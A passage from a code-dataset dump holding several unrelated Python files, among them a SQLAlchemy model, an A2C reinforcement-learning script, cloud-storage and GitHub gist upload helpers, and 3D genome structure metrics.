xml_output\n","repo_name":"petrchatrny/receptnik","sub_path":"src/controllers/format_controller.py","file_name":"format_controller.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3681414327","text":"from __future__ import annotations\n\nfrom my_project import db\nfrom my_project.auth.domain.i_dto import IDto\n\nclient_pet = db.Table(\n \"client_pet\",\n db.Column(\"client_Id\", db.Integer, db.ForeignKey(\"client.id\")),\n db.Column(\"pet_id\", db.Integer, db.ForeignKey(\"pet.id\")),\n extend_existing=True\n)\n\n\nclass Client(db.Model, IDto):\n __tablename__ = \"client\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)\n name = db.Column(db.String(45), nullable=False)\n surname = db.Column(db.String(45), nullable=False)\n contact_number = db.Column(db.String(13), nullable=False)\n address = db.Column(db.String(45), nullable=False)\n email = db.Column(db.String(45), nullable=True)\n additional_contact_info = db.Column(db.String(150), nullable=True)\n\n # Relationship M:M\n pets = db.relationship('Pet', secondary=client_pet, backref=db.backref('clients_association', lazy='dynamic'))\n scheduled_visit = db.relationship('ScheduledVisit', back_populates='client')\n\n def __repr__(self) -> str:\n return f\"Client({self.id}, '{self.name}', '{self.surname}', '{self.contact_number}', '{self.address}',\" \\\n f\" '{self.email}', '{self.additional_contact_info}')\"\n\n def put_into_dto(self) -> dict[str, object]:\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"surname\": self.surname,\n \"contact_number\": self.contact_number,\n \"address\": self.address,\n \"email\": self.email,\n \"additional_contact_info\": self.additional_contact_info,\n }\n\n @staticmethod\n def create_from_dto(dto_dict: dict[str, object]) -> Client:\n obj = Client(\n name=dto_dict.get(\"name\"),\n surname=dto_dict.get(\"surname\"),\n contact_number=dto_dict.get(\"contact_number\"),\n address=dto_dict.get(\"address\"),\n email=dto_dict.get(\"email\"),\n additional_contact_info=dto_dict.get(\"additional_contact_info\")\n )\n return obj\n","repo_name":"Dubyk-Yura/Database_labs","sub_path":"my_project/auth/domain/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30022776648","text":"days = {\n 1: 'pondělí',\n 2: 'úterý',\n 3: 'středa',\n 4: 'čtvrtek',\n 5: 'pátek',\n 6: 'sobota',\n 7: 'neděle',\n}\n\nfrequency = {\n '7': 'WEEKLY',\n '14': 'BIWEEKLY',\n '30': 'MONTHLY'\n}\n\ndef map_waste_type(type, mappings):\n ret = []\n if type in mappings:\n for t in mappings[type].split(','):\n ret.append('https://data.mvcr.gov.cz/zdroj/číselníky/typy-tříděného-odpadu/položky/{}'.format(t.strip()))\n\n return ret\n\ndef get_owner(owner, owners):\n if not owner:\n return None\n\n if owner in owners:\n o = owners[owner]\n return {\n 'typ': 'Osoba',\n 'ičo': str(o['ico']),\n 'název': {\n 'cs': o['name']\n }\n }\n elif 'městská část Brno' in owner:\n return {\n 'typ': 'Osoba',\n 'ičo': str(owners['_brno']['ico']),\n 'název': {\n 'cs': owner\n }\n }\n\n return None\n\ndef get_pickup(item):\n ret = []\n\n for day in range(1,8):\n d = 'vyvoz_{}'.format(day)\n f = 'vyvoz_{}_interval'.format(day)\n\n if item[f] in frequency:\n f = frequency[str(item[f])]\n else:\n f = 'IRREG'\n\n if item[d] == 'A':\n ret.append({\n 'den_v_týdnu': [\n 
\n                    'https://data.mvcr.gov.cz/zdroj/číselníky/dny-v-týdnu/položky/{}'.format(days[day])\n                ],\n                'frekvence': [\n                    'http://publications.europa.eu/resource/authority/frequency/{}'.format(f)\n                ]\n            })\n\n    return ret\n\ndef build_container(src, config):\n    attr = src.get('attributes')\n    geo = src.get('geometry')\n    iri = 'https://www.brno.cz/container/{}'.format(attr.get('tid'))\n\n    ret = {\n        '@context': 'https://pod-test.mvcr.gov.cz/otevřené-formální-normy/nádoby-na-tříděný-odpad/draft/kontexty/nádoby-na-tříděný-odpad.jsonld',\n        'typ': 'Nádoba na tříděný odpad',\n        'iri': iri,\n        'stanoviště_pro_nádoby': {\n            'typ': 'Stanoviště pro nádoby na tříděný odpad',\n            'iri': 'https://www.brno.cz/container-station/{}'.format(attr.get('stanoviste_ogc_fid')),\n        },\n        'časy_vývozu': get_pickup(attr)\n    }\n\n    waste_type = map_waste_type(attr.get('komodita_odpad_separovany'), config['waste_mapping'])\n    if waste_type:\n        ret['typ_tříděného_odpadu'] = waste_type\n\n    public = attr.get('verejnost')\n    if public:\n        ret['veřejná_přístupnost'] = public == 'A'\n\n\n    volume = attr.get('objem')\n    if volume:\n        ret['objem'] = {\n            'typ': 'Množství',\n            'hodnota': volume,\n            'jednotka': 'LTR'\n        }\n\n    owner = get_owner(attr.get('majitel'), config['owners'])\n    if owner:\n        ret['správce'] = owner\n\n    x = float(geo.get('x', 0))\n    y = float(geo.get('y', 0))\n\n    if x != 0 and y != 0:\n        ret['stanoviště_pro_nádoby']['umístění'] = [{\n            'typ': 'Umístění',\n            'geometrie': {\n                'type': 'Point',\n                'coordinates': [x, y]\n            },\n        }]\n\n    return ret\n\n\n","repo_name":"opendatabrno/HUBtoNKOD","sub_path":"builder/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"cs","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"34338537239","text":"from xml.dom.minidom import parse, parseString\n\ndom = parse(\"eat100.xml\")\n\nstimuli = dom.getElementsByTagName('stimulus')\nwords = dict()\n\nfor i in range(100):\n\tstim_word = str(stimuli[i].attributes['word'].value)\n\tresponses = stimuli[i].getElementsByTagName('response')\n\tresponse_words = []\n\tfor response in responses:\n\t\tresponse_word = str(response.attributes['word'].value)\n\t\tpercent = str(response.attributes['r'].value)\n\t\tresponse_words.append((response_word, percent))\n\twords[stim_word] = response_words\n\nfor word in words:\n\tfor response in words[word]:\n\t\tline = \"<\" + word + \">\" + \"cn:relates-to\" + \"<\" + response[0] + \">\" + \"r=\" + response[1] + '\\n'\n\t\tprint(line)","repo_name":"tetherless-world/mowgli-etl","sub_path":"mowgli_etl/pipeline/eat/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"}
+{"seq_id":"75273480484","text":"from oslo_middleware import request_id\nimport webob\n\nfrom octavia.common import constants\n\n\n# Inspired by the OpenStack Placement service utils.py\ndef json_error_formatter(body, status, title, environ):\n    \"\"\"A json_formatter for webob exceptions.\n\n    Follows API-WG guidelines at\n    http://specs.openstack.org/openstack/api-wg/guidelines/errors.html\n    \"\"\"\n    # Clear out the html that webob sneaks in.\n    body = webob.exc.strip_tags(body)\n    # Get status code out of status message. 
webob's error formatter\n # only passes entire status string.\n status_code = int(status.split(None, 1)[0])\n error_dict = {\n constants.STATUS: status_code,\n constants.TITLE: title,\n constants.DETAIL: body\n }\n\n # If the request id middleware has had a chance to add an id,\n # put it in the error response.\n if request_id.ENV_REQUEST_ID in environ:\n error_dict[constants.REQUEST_ID] = environ[request_id.ENV_REQUEST_ID]\n\n return {constants.ERRORS: [error_dict]}\n","repo_name":"openstack/octavia","sub_path":"octavia/api/common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"52"} +{"seq_id":"2291063438","text":"\"\"\"Running this uploads all Python modules in this folder to an S3 bucket, to\naccess when training on Colab or another cloud service.\n\"\"\"\n\nimport os\nimport code\n\nimport boto3\nfrom google.cloud import storage\n\nfrom ccn.cfg import get_config; CFG = get_config()\n\nS3_BUCKET_NAME = CFG['s3_bucket']\nGS_BUCKET_NAME = CFG['gs_bucket']\ncode_path = os.path.dirname(os.path.abspath(__file__))\n# S3\ns3_bucket = boto3.resource('s3').Bucket(S3_BUCKET_NAME)\ns3_client = boto3.client('s3')\n# GS\nif CFG['USE_GS']:\n gs_client = storage.Client()\n gs_bucket = gs_client.bucket(GS_BUCKET_NAME)\n\n\ndef s3_upload_data(s3_path, body):\n \"\"\"Upload data to S3 bucket at a particular path\n \"\"\"\n s3_bucket.put_object(Key=s3_path, Body=body)\n\n\ndef s3_upload_file(local_path, s3_path):\n \"\"\"Upload a locally-saved file to S3\n \"\"\"\n s3_client.upload_file(local_path, S3_BUCKET_NAME, s3_path)\n\n\ndef gs_upload_blob(source_file_name, destination_blob_name):\n \"\"\"Upload a file to Google Storage bucket\n \"\"\"\n blob = gs_bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n print(\n \"File {} uploaded to {}\".format(\n source_file_name, destination_blob_name\n )\n )\n\n\ndef gs_upload_blob_from_memory(source_file, destination_blob_name):\n blob = gs_bucket.blob(destination_blob_name)\n blob.upload_from_file(source_file)\n print(f\"File uploaded to {destination_blob_name}\")\n\n\ndef gs_upload_blob_from_string(source_string, destination_blob_name, print_str=False):\n blob = gs_bucket.blob(destination_blob_name)\n blob.upload_from_string(source_string, content_type=\"application/json\")\n if print_str:\n print(source_string)\n print(f\"File uploaded to {destination_blob_name}\")\n\n\ndef gs_download_blob_as_string(blob_name):\n blob = gs_bucket.blob(blob_name)\n blob_str = blob.download_as_string()\n return blob_str\n\n\ndef gs_folder_exists(file_name):\n blobs = list(gs_client.list_blobs(GS_BUCKET_NAME, prefix=file_name))\n if len(blobs) > 0:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n for file in os.listdir(code_path):\n if file.endswith('.py') or file.endswith('.json'):\n with open(os.path.join(code_path, file), 'r') as f:\n py_code = f.read()\n print(f\"Uploading {file}\")\n s3_upload_data(f\"ccn/{file}\", py_code)\n # upload setup.py\n file = '../setup.py'\n with open(os.path.join(code_path, file), 'r') as f:\n py_code = f.read()\n print(\"Uploading setup.py\")\n s3_upload_data(\"setup.py\", py_code)\n","repo_name":"noahtren/Cooperative-Communication-Networks","sub_path":"ccn/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"39813712041","text":"'''\n200. 
Number of Islands\nLink: https://leetcode.com/problems/number-of-islands/submissions/\n\nGiven an m x n 2d grid map of '1's (land) and '0's (water), return the number of islands.\nAn island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically.\nYou may assume all four edges of the grid are all surrounded by water.\n\nInput: grid = [\n    ['1', '1', '1', '1', '0'],\n    ['1', '1', '0', '1', '0'],\n    ['1', '1', '0', '0', '0'],\n    ['0', '0', '0', '0', '0']\n]\nOutput: 1\n\nInput: grid = [\n    ['1', '1', '0', '0', '0'],\n    ['1', '1', '0', '0', '0'],\n    ['0', '0', '1', '0', '0'],\n    ['0', '0', '0', '1', '1']\n]\nOutput: 3\n'''\n\n\nclass Solution:\n\n\tdef num_of_lands(self, grid) -> int:\n\t\tif not grid:\n\t\t\treturn 0\n\n\t\tcount = 0\n\t\tn, m = len(grid), len(grid[0])\n\n\t\tfor row in range(n):\n\t\t\tfor col in range(m):\n\t\t\t\tif grid[row][col] == '1':\n\t\t\t\t\tself.dfs(grid, row, col)\n\t\t\t\t\tcount += 1\n\n\t\treturn count\n\n\tdef is_cell_outside(self, grid, row, col):\n\t\tn, m = len(grid), len(grid[0])\n\t\tout_bounds = row < 0 or row >= n or col < 0 or col >= m\n\t\treturn out_bounds\n\n\tdef dfs(self, grid, row, col):\n\t\t'''SINK ISLAND'''\n\n\t\tout_bounds = self.is_cell_outside(grid, row, col)\n\t\tif out_bounds or grid[row][col] == '0':\n\t\t\treturn\n\n\t\tgrid[row][col] = '0'  # SINK\n\n\t\tself.dfs(grid, row, col + 1)\n\t\tself.dfs(grid, row, col - 1)\n\t\tself.dfs(grid, row + 1, col)\n\t\tself.dfs(grid, row - 1, col)\n\n\nsoln = Solution()\n\ngrid1 = [\n    ['1', '1', '1', '1', '0'],\n    ['1', '1', '0', '1', '0'],\n    ['1', '1', '0', '0', '0'],\n    ['0', '0', '0', '0', '0']\n]\nassert soln.num_of_lands(grid1) == 1\n\ngrid2 = [\n    ['1', '1', '0', '0', '0'],\n    ['1', '1', '0', '0', '0'],\n    ['0', '0', '1', '0', '0'],\n    ['0', '0', '0', '1', '1']\n]\nassert soln.num_of_lands(grid2) == 3\n","repo_name":"ErickMwazonga/sifu","sub_path":"backtracking/2D/no_of_islands.py","file_name":"no_of_islands.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"}
+{"seq_id":"42383388336","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2021/8/4 11:02 PM\n# @Author : tinyzqh\n# @Email : tinyzqh@163.com\n# @File : naiveA2C.py\n\"\"\"\n\nimport gym\nimport argparse\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.distributions import Categorical\nimport matplotlib.pyplot as plt\n\nfrom multiprocessing import Process, Pipe\n\n\ndef worker(remote, parent_remote, env_fn_wrapper):\n    parent_remote.close()\n    env = env_fn_wrapper.x()\n    while True:\n        cmd, data = remote.recv()\n        if cmd == 'step':\n            ob, reward, done, info = env.step(data)\n            if done:\n                ob = env.reset()\n            remote.send((ob, reward, done, info))\n        elif cmd == 'reset':\n            ob = env.reset()\n            remote.send(ob)\n        elif cmd == 'reset_task':\n            ob = env.reset_task()\n            remote.send(ob)\n        elif cmd == 'close':\n            remote.close()\n            break\n        elif cmd == 'get_spaces':\n            remote.send((env.observation_space, env.action_space))\n        else:\n            raise NotImplementedError\n\n\nclass VecEnv(object):\n    \"\"\"\n    An abstract asynchronous, vectorized environment.\n    # This code is from openai baseline\n    # https://github.com/openai/baselines/tree/master/baselines/common/vec_env\n    \"\"\"\n\n    def __init__(self, num_envs, observation_space, action_space):\n        self.num_envs = num_envs\n        self.observation_space = observation_space\n        self.action_space = action_space\n\n    def reset(self):\n        \"\"\"\n        Reset all 
the environments and return an array of\n observations, or a tuple of observation arrays.\n If step_async is still doing work, that work will\n be cancelled and step_wait() should not be called\n until step_async() is invoked again.\n \"\"\"\n pass\n\n def step_async(self, actions):\n \"\"\"\n Tell all the environments to start taking a step\n with the given actions.\n Call step_wait() to get the results of the step.\n You should not call this if a step_async run is\n already pending.\n \"\"\"\n pass\n\n def step_wait(self):\n \"\"\"\n Wait for the step taken with step_async().\n Returns (obs, rews, dones, infos):\n - obs: an array of observations, or a tuple of\n arrays of observations.\n - rews: an array of rewards\n - dones: an array of \"episode done\" booleans\n - infos: a sequence of info objects\n \"\"\"\n pass\n\n def close(self):\n \"\"\"\n Clean up the environments' resources.\n \"\"\"\n pass\n\n def step(self, actions):\n self.step_async(actions)\n return self.step_wait()\n\n\nclass CloudpickleWrapper(object):\n \"\"\"\n Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)\n \"\"\"\n\n def __init__(self, x):\n self.x = x\n\n def __getstate__(self):\n import cloudpickle\n return cloudpickle.dumps(self.x)\n\n def __setstate__(self, ob):\n import pickle\n self.x = pickle.loads(ob)\n\n\nclass SubprocVecEnv(VecEnv):\n def __init__(self, env_fns, spaces=None):\n \"\"\"\n envs: list of gym environments to run in subprocesses\n \"\"\"\n self.waiting = False\n self.closed = False\n nenvs = len(env_fns)\n self.nenvs = nenvs\n self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])\n self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))\n for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]\n for p in self.ps:\n p.daemon = True # if the main process crashes, we should not cause things to hang\n p.start()\n for remote in self.work_remotes:\n remote.close()\n\n self.remotes[0].send(('get_spaces', None))\n observation_space, action_space = self.remotes[0].recv()\n VecEnv.__init__(self, len(env_fns), observation_space, action_space)\n\n def step_async(self, actions):\n for remote, action in zip(self.remotes, actions):\n remote.send(('step', action))\n self.waiting = True\n\n def step_wait(self):\n results = [remote.recv() for remote in self.remotes]\n self.waiting = False\n obs, rews, dones, infos = zip(*results)\n return np.stack(obs), np.stack(rews), np.stack(dones), infos\n\n def reset(self):\n for remote in self.remotes:\n remote.send(('reset', None))\n return np.stack([remote.recv() for remote in self.remotes])\n\n def reset_task(self):\n for remote in self.remotes:\n remote.send(('reset_task', None))\n return np.stack([remote.recv() for remote in self.remotes])\n\n def close(self):\n if self.closed:\n return\n if self.waiting:\n for remote in self.remotes:\n remote.recv()\n for remote in self.remotes:\n remote.send(('close', None))\n for p in self.ps:\n p.join()\n self.closed = True\n\n def __len__(self):\n return self.nenvs\n\n\ndef make_env(args):\n def _thunk():\n env = gym.make(args.env_name)\n return env\n\n return _thunk\n\n\nclass ActorCritic(nn.Module):\n def __init__(self, num_inputs, num_outputs, hidden_size, std=0.0):\n super(ActorCritic, self).__init__()\n\n self.critic = nn.Sequential(\n nn.Linear(num_inputs, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1)\n )\n\n self.actor = nn.Sequential(\n nn.Linear(num_inputs, hidden_size),\n nn.ReLU(),\n 
nn.Linear(hidden_size, num_outputs),\n nn.Softmax(dim=1),\n )\n\n def forward(self, x):\n value = self.critic(x)\n probs = self.actor(x)\n dist = Categorical(probs)\n return dist, value\n\n\ndef test_env(args, vis=False):\n env = gym.make(args.env_name) # a single env\n state = env.reset()\n if vis: env.render()\n done = False\n total_reward = 0\n while not done:\n state = torch.FloatTensor(state).unsqueeze(0).to(device)\n dist, _ = model(state)\n next_state, reward, done, _ = env.step(dist.sample().cpu().numpy()[0])\n state = next_state\n if vis: env.render()\n total_reward += reward\n return total_reward\n\n\ndef compute_returns(next_value, rewards, masks, gamma=0.99):\n R = next_value\n returns = []\n for step in reversed(range(len(rewards))):\n R = rewards[step] + gamma * R * masks[step]\n returns.insert(0, R)\n return returns\n\n\ndef plot(epoch, rewards):\n plt.plot(rewards, 'b-')\n plt.title('frame %s. reward: %s' % (epoch, rewards[-1]))\n plt.pause(0.0001)\n\n\nclass Agent(object):\n def __init__(self, env, exp_buffer, args):\n super(Agent, self).__init__()\n\n def build_model(self):\n pass\n\n def learn(self):\n pass\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"the parameter of a2c\")\n parser.add_argument('--hidden_size', type=int, help=\"maximum capacity of the buffer\", default=256)\n parser.add_argument('--lr', type=float, help='learning rate used in the Adam optimizer', default=1e-3)\n parser.add_argument('--num_steps', type=int, help=\"the num of rollout\", default=5)\n parser.add_argument(\"--env_name\", default=\"CartPole-v0\") # OpenAI gym environment name\n parser.add_argument(\"--num_envs\", type=int, default=8) # OpenAI gym environment name\n arg = parser.parse_args()\n\n plt.ion()\n envs = [make_env(arg) for i in range(arg.num_envs)]\n envs = SubprocVecEnv(envs) # 8 env\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = ActorCritic(envs.observation_space.shape[0], envs.action_space.n, arg.hidden_size).to(device)\n optimizer = optim.Adam(model.parameters())\n\n test_rewards = []\n\n state = envs.reset()\n for epoch in range(20000):\n log_probs = []\n values = []\n rewards = []\n masks = []\n entropy = 0\n\n for _ in range(arg.num_steps): # rollout trajectory\n state = torch.FloatTensor(state).to(device)\n dist, value = model(state)\n\n action = dist.sample()\n next_state, reward, done, _ = envs.step(action.cpu().numpy())\n\n log_prob = dist.log_prob(action)\n entropy += dist.entropy().mean()\n\n log_probs.append(log_prob)\n values.append(value)\n rewards.append(torch.FloatTensor(reward).unsqueeze(1).to(device))\n masks.append(torch.FloatTensor(1 - done).unsqueeze(1).to(device))\n\n state = next_state\n\n if epoch % 100 == 0:\n test_rewards.append(np.mean([test_env(args=arg) for _ in range(10)]))\n plot(epoch, test_rewards)\n\n next_state = torch.FloatTensor(next_state).to(device)\n _, next_value = model(next_state)\n returns = compute_returns(next_value, rewards, masks)\n\n log_probs = torch.cat(log_probs)\n returns = torch.cat(returns).detach()\n values = torch.cat(values)\n\n advantage = returns - values\n\n actor_loss = -(log_probs * advantage.detach()).mean()\n critic_loss = advantage.pow(2).mean()\n\n loss = actor_loss + 0.5 * critic_loss - 0.001 * entropy\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # test_env(True)\n","repo_name":"tinyzqh/awesome-reinforcement-learning","sub_path":"chap10 
A2C/naiveA2C.py","file_name":"naiveA2C.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"52"} +{"seq_id":"23301001783","text":"import httplib\nimport urllib\nimport re\nimport os.path\nfrom optparse import OptionParser\nimport platform\nimport sys\nimport json\nimport logging\nfrom copy import deepcopy\n\nFORMAT = \"[%(levelname)s %(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s\"\nlogging.basicConfig(level=logging.ERROR, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\ntry:\n from ssl import _create_unverified_context\n have_ssl = True\nexcept ImportError:\n logger.error(\"ERROR - could not import ssl._create_unverified_context; unable to disable SSL cert verification\")\n have_ssl = False\n\ndef debug_response(response):\n logger.debug(\"Response status {s}\".format(s=response.status))\n logger.debug(\"Response: {d}\".format(d=response.read()))\n logger.debug(\"Headers: \\n{h}\".format(\n h='\\n'.join(['{k}: {v}\\n'.format(k=i[0], v=i[1]) for i in response.getheaders()])\n ))\n\ndef gist_write(name, content, token=None, prefix=False, no_verify=False):\n if prefix:\n name = '{n}_{name}'.format(n=platform.node(), name=name)\n logger.debug(\"Setting name to: {n}\".format(n=name))\n\n data = {\n 'public': False,\n 'files': {\n name: {\n 'content': content\n }\n }\n }\n\n # data debug\n d = deepcopy(data)\n if len(d['files'][name]['content']) > 800:\n tmp = d['files'][name]['content']\n d['files'][name]['content'] = tmp[:200] + \"\\n...\\n\" + tmp[-200:]\n logger.debug(\"POST data: {d}\".format(d=d))\n headers = {'User-Agent': 'https://github.com/jantman/misc-scripts/blob/master/gist.py'}\n if token is not None:\n headers['Authorization'] = 'token {t}'.format(t=token)\n logger.debug(\"Setting Authorization header to: {h}\".format(h=headers['Authorization']))\n\n if no_verify:\n conn = httplib.HTTPSConnection(\"api.github.com\", context=_create_unverified_context())\n else:\n conn = httplib.HTTPSConnection(\"api.github.com\")\n logger.debug(\"Opened connection to https://api.github.com\")\n logger.debug(\"POSTing to /gists\")\n conn.request(\"POST\", \"/gists\", json.dumps(data), headers)\n response = conn.getresponse()\n debug_response(response)\n if response.status == 201:\n data = response.read()\n conn.close()\n try:\n d = json.loads(data)\n return(d['html_url'])\n except:\n pass\n logger.error(\"Got 201 status but no JSON response\")\n logger.debug(\"Response: \\n{d}\".format(d=data))\n h = response.getheaders()\n for header in h:\n if header[0] == 'location':\n url = header[1].replace('api.github.com/gists/', 'gist.github.com/')\n return url\n return ''\n logger.error(\"ERROR - got response code {s}\".format(s=response.status))\n conn.close()\n raise SystemExit(1)\n\nusage = 'USAGE: gist.py [options] filename'\nparser = OptionParser(usage=usage)\nparser.add_option('-d', '--description', dest='description', action='store',\n type=str, help='Gist description')\nparser.add_option('-p', '--prefix', dest='prefix', action='store_false',\n default=True,\n help='prefix gist filename with hostname')\nparser.add_option('-v', '--verbose', dest='verbose', action='store_true',\n help='verbose output')\nparser.add_option('-V', '--no-verify', dest='no_verify', action='store_true',\n default=False, help='do not verify SSL')\n(options, args) = parser.parse_args()\n\nif options.verbose:\n logger.setLevel(logging.DEBUG)\n\nif options.no_verify and not have_ssl:\n logger.error(\"ERROR: could not import 
ssl._create_unverified_context; therefore unable to disable SSL cert verification\")\n    raise SystemExit(1)\n\nif len(args) < 1:\n    sys.stderr.write(usage + \"\\n\")\n    raise SystemExit(1)\n\nif not os.path.exists(args[0]):\n    logger.error(\"ERROR: {f} does not exist\".format(f=args[0]))\n    raise SystemExit(1)\n\ntoken = raw_input(\"GitHub API Token: \").strip()\nif token == '':\n    logger.error(\"ERROR: empty token\")\n    raise SystemExit(1)\n\nwith open(args[0], 'r') as fh:\n    content = fh.read()\n\nname = args[0]\nurl = gist_write(name, content, token=token, prefix=options.prefix, no_verify=options.no_verify)\nlogger.info(\"Created: {u}\".format(u=url))\n","repo_name":"jantman/misc-scripts","sub_path":"gist.py","file_name":"gist.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"}
+{"seq_id":"35629844752","text":"# File rectangle.py\nimport ctypes\n\nlib = ctypes.cdll.LoadLibrary('./librectangle.so')\n\nclass Rectangle:\n    def __init__(self, width, height):\n        self._methods = dict()\n        self._methods['area'] = lib.area\n        self._methods['perimeter'] = lib.perimeter\n        lib.create.argtypes = (ctypes.c_double, ctypes.c_double)\n        lib.create.restype = ctypes.c_void_p\n        lib.area.argtypes = (ctypes.c_void_p,)\n        lib.area.restype = ctypes.c_double\n        lib.perimeter.argtypes = (ctypes.c_void_p,)\n        lib.perimeter.restype = ctypes.c_double\n        self.obj = lib.create(width, height)\n        self._m_name = None\n\n    def __getattr__(self, attr):\n        self._m_name = attr\n        return self.__call_method\n\n    def __call_method(self, *args):\n        return self._methods[self._m_name](self.obj, *args)","repo_name":"hitlic/python_book","sub_path":"codes/chapter-09/eg_9-11/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"}
+{"seq_id":"19012299990","text":"#calculate the metrics of dRMSE, dPCC and dSCC\nimport math\nimport numpy as np\nimport pandas as pd\n\ndef calxyzDist(xyzDir):\n    xyz = np.loadtxt(xyzDir)\n    d = np.zeros((len(xyz), len(xyz)))\n    for i in range(len(xyz)):\n        for j in range(len(xyz)):\n            if not np.isnan(xyz[i]).any() and not np.isnan(xyz[j]).any():\n                d[i,j]=np.sqrt(np.sum((xyz[i] - xyz[j])**2))\n    return d\n\ndef calcDistance(coord1, coord2):\n    \"\"\"Euclidean distance between coordinates\"\"\"\n    return ((coord1[0] - coord2[0])**2 + (coord1[1] - coord2[1])**2 + (coord1[2] - coord2[2])**2)**(1./2)\n\ndef radius_of_gyration(coords):\n    centroid = np.mean(coords, axis=0)\n    dist_sum = sum([calcDistance(coord, centroid) for coord in coords])\n    return dist_sum/len(coords)\n\n#evaluate the metrics with calculated distance from Hi-C contact matrix\ndef evalMetrics(distDir,xyzDir,evalfileDir,hicfilename,alpha):\n    d=calxyzDist(xyzDir)\n    D = np.loadtxt(distDir)\n    print(len(D),len(d))\n    #dRMSE\n    scaling_factor = radius_of_gyration(D)/radius_of_gyration(d)\n    drms = 0\n    for i in range(len(D)):\n        for j in range(len(d)):\n            drms = drms + (d[i,j] * scaling_factor-D[i,j])**2\n    drms = drms / (len(D)**2)\n    drms = math.sqrt(drms)\n    drms=np.around(drms,2)\n    print(\"dRMSE:\",drms)\n\n    # dPCC\n    df = pd.DataFrame({'D':D.reshape(-1),'d':d.reshape(-1)})\n    pcc=df.corr()\n    pcc=np.array(pcc.iloc[[1],[0]])[0][0]\n    pcc=np.around(pcc,3)\n    print(\"dPCC:\",pcc)\n\n    #dSCC\n    scc=df.corr('spearman')\n    scc=np.array(scc.iloc[[1],[0]])[0][0]\n    scc=np.around(scc,3)\n    print(\"dSCC:\",scc)\n    with open(evalfileDir,'a+') as f:\n        f.write(\"\\t\".join((str(hicfilename),str(alpha),str(drms),str(pcc),str(scc)))+'\\n')\n        f.close()\n    return drms,pcc,scc\n\n#evaluate the metrics with true xyz of simulated Hi-C\ndef evalTrue(truexyzDir,xyzDir,trueevalfileDir,hicfilename,alpha):\n    d=calxyzDist(xyzDir)\n    D = calxyzDist(truexyzDir)\n    print(len(D),len(d))\n    #dRMSE\n    scaling_factor = radius_of_gyration(D)/radius_of_gyration(d)\n    drms = 0\n    for i in range(len(D)):\n        for j in range(len(d)):\n            drms = drms + (d[i,j] * scaling_factor-D[i,j])**2\n    drms = drms / (len(D)**2)\n    drms = math.sqrt(drms)\n    print(\"dRMSE:\",drms)\n\n    # dPCC\n    df = pd.DataFrame({'D':D.reshape(-1),'d':d.reshape(-1)})\n    pcc=df.corr()\n    pcc=np.array(pcc.iloc[[1],[0]])[0][0]\n    pcc=np.around(pcc,3)\n    print(\"dPCC:\",pcc)\n\n    #dSCC\n    scc=df.corr('spearman')\n    scc=np.array(scc.iloc[[1],[0]])[0][0]\n    scc=np.around(scc,3)\n    print(\"dSCC:\",scc)\n\n    with open(trueevalfileDir,'a+') as f:\n        f.write(\"\\t\".join((str(hicfilename),str(alpha),str(drms),str(pcc),str(scc)))+'\\n')\n        f.close()\n    return drms,pcc,scc\n\"\"\"\ntrue Hi-C data\n#'_NeRV_chr19_50000_0.4','NeRV','LargeVis','3DMax','ShNeigh1','GEM','EVR'\n#ShNeigh1 and LorDG: the dimensions are problematic, 1121\n\n\nfor xyzname in ['miniMDS']:\n    distDir1=\"/data1/ghy_data/GM12878/3DResults/NeRV_3D/chr19_50000_0.3.dist\"\n    distDir2=\"/data1/ghy_data/GM12878/3DResults/NeRV_3D/chr19_50000_0.4.dist\"\n    xyzDir=\"/home/ghaiyan/project/NeRV-3D/GM12878/chr19_50kb/\"+xyzname+\".xyz\"\n    evalfileDir=\"/home/ghaiyan/project/NeRV-3D/GM12878/chr19_50kb/evalueCompare_test.txt\"\n    hicfilename=\"/home/ghaiyan/project/NeRV-3D/chrtest/test.hic\"\n    trueevalfileDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/evalueComparetrue_test.txt\"\n    truexyzDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/test2000.xyz\"\n    alpha1=0.3\n    alpha2=0.4\n    